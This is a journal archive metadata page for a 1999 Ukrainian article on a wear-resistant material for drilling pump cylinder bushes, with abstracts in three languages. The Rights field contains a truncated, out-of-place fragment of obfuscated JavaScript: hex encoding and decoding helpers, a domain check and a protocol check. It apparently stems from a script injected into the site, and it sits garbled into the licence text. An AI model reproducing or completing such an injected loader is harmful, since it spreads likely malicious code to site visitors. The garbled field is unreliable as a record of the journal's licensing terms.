Новий матеріал для умов абразивного зношування
Наукові журнали Національного Авіаційного Університету
View Archive InfoField | Value | |
Title |
Новий матеріал для умов абразивного зношування
Новый материал для условий абразивного изнашивания New material for wearing in abrasive conditions |
|
Creator |
Дворук, В. И.; Національний авіаційний університет
Шевеля, И. В.; Національний авіаційний університет Радченко, А. В.; Національний авіаційний університет |
|
Subject |
—
— УДК 621.891 — — УДК 621.891 — — УДК 621.891 |
|
Description |
Обгрунтована доцільність принципа структурного "підресорювання" для створення зносостійких матеріалів в умовах абразивного зношування, на базі якого створений новий матеріал. Експериментально підтверджена висока працездатність нового матеріала на прикладі вирішення задачі підвищення абразивної зносостійкості циліндрових втулок до бурових насосів
Обоснована целесообразность принципа структурного "подрессорирования" для создания износостойких материалов, предназначенных для применения в условиях абразивного изнашивания, на базе которого разработан новый материал. Экспериментально подтверждена высокая работоспособность нового материала на примере решения задачи повышения абразивной износостойкости цилиндровых втулок для буровых насосов Substantiated is the expediency of the principle of using "spring" for the creation of wear resistant materials in conditions of abrasive wearing, on the basis of which new material is created. Proved experimentally is high efficiency of new material, which solves the problem of increasing abrasive-wear resistance of cylinder bushes for bore pumps |
|
Publisher |
National Aviation University
|
|
Contributor |
—
— — |
|
Date |
1999-05-12
|
|
Type |
—
— — |
|
Format |
application/pdf
|
|
Identifier |
http://jrnl.nau.edu.ua/index.php/visnik/article/view/8975
10.18372/2306-1472.2.8975 |
|
Source |
Proceedings of the National Aviation University; Том 2, № 1 (1999); 56-61
Вестник Национального авиационного университета; Том 2, № 1 (1999); 56-61 Вісник Національного Авіаційного Університету; Том 2, № 1 (1999); 56-61 |
|
Language |
ru
|
|
Rights |
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access). |
|